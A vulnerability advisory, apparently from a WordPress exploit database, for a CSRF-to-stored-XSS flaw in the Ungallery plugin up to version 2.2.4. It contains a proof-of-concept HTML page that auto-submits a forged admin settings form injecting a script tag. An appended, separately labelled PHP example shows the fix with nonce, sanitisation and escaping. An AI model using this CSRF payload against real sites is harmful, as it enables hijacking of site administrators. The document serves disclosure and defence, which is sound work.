wpexploit | Bob Matyas | WPEX-ID:5A348B5D-13AA-40C3-9D21-0554683F8019
History: Apr 18, 2024 - 12:00 a.m.

Ungallery <= 2.2.4 - Stored XSS via CSRF

2024-04-18 00:00:00
Bob Matyas
51
Tags: ungallery, stored xss, csrf, update, exploit
May 02 2024

AI Score: 5.9
Confidence: High
EPSS: 0
Percentile: 9.0%

Description: The plugin does not have a CSRF check in some places and is also missing sanitisation and escaping, which could allow attackers to make a logged-in admin add Stored XSS payloads via a CSRF attack.

Make a logged-in admin open an HTML file containing the following:

```html
<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/options-general.php?page=ungallerysettings" method="POST">
        <input type="hidden" name="mt_submit_hidden" value="Y">
        <input type="hidden" name="images_path" value="/var/www/html/wp-content/uploads/2024/01/*">
        <input type="hidden" name="URI" value="<? print get_bloginfo('url'); ?>/" >
        <input type="hidden" name="gallery" value="ungallery">
        <input type="hidden" name="version" value="2.2.4">
        <input type="hidden" name="gallery2" value='"><script>alert(2)</script>'>
        <input type="hidden" name="cache_dir" value="/var/www/html/wp-content/cache/">
        <button type="submit">Save Changes</button>
    </form>
</body>
```
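As an added defensive example (not the Ungallery plugin's own code and not part of the advisory), the following minimal WordPress settings handler shows the three controls whose absence the description reports: a nonce-based CSRF check, sanitisation of posted values before they are stored, and escaping when they are rendered back into the form. The page slug, option name, capability and field names are assumptions chosen for illustration.

```php
<?php
/**
 * Added example, not the Ungallery plugin's code. A hypothetical settings
 * page ("example-gallery") that closes the three gaps named in the advisory:
 * CSRF check (nonce), input sanitisation, and output escaping.
 * Option name, field names and page slug are assumed for illustration.
 */

// Render the settings form: nonce field plus escaped current values.
function example_gallery_settings_page() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( esc_html__( 'Insufficient permissions.', 'example-gallery' ) );
    }
    $opts         = get_option( 'example_gallery_options', array() );
    $gallery_name = isset( $opts['gallery'] ) ? $opts['gallery'] : '';
    $images_path  = isset( $opts['images_path'] ) ? $opts['images_path'] : '';
    ?>
    <form method="post" action="<?php echo esc_url( admin_url( 'options-general.php?page=example-gallery' ) ); ?>">
        <?php wp_nonce_field( 'example_gallery_save', 'example_gallery_nonce' ); ?>
        <input type="hidden" name="example_gallery_submit" value="Y">
        <label>Gallery name
            <!-- esc_attr() neutralises a stored value such as "><script>...  -->
            <input type="text" name="gallery" value="<?php echo esc_attr( $gallery_name ); ?>">
        </label>
        <label>Images path
            <input type="text" name="images_path" value="<?php echo esc_attr( $images_path ); ?>">
        </label>
        <?php submit_button(); ?>
    </form>
    <?php
}

// Handle the POST: verify capability and nonce before touching any option,
// then sanitise each field before it is stored.
function example_gallery_handle_save() {
    if ( ! isset( $_POST['example_gallery_submit'] ) ) {
        return;
    }
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( esc_html__( 'Insufficient permissions.', 'example-gallery' ) );
    }
    // check_admin_referer() stops the request when the nonce is missing or
    // invalid, which is the case for a form auto-submitted from a foreign
    // page like the one in the PoC above.
    check_admin_referer( 'example_gallery_save', 'example_gallery_nonce' );

    $opts = array(
        'gallery'     => sanitize_text_field( wp_unslash( $_POST['gallery'] ?? '' ) ),
        'images_path' => sanitize_text_field( wp_unslash( $_POST['images_path'] ?? '' ) ),
    );
    update_option( 'example_gallery_options', $opts );
}
add_action( 'admin_init', 'example_gallery_handle_save' );
```

The same result can be reached with the WordPress Settings API (`register_setting()` with a `sanitize_callback`, plus `settings_fields()` in the form), which emits the nonce and routes the save through `options.php`; the hand-written handler above just makes each of the three checks visible in one place.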
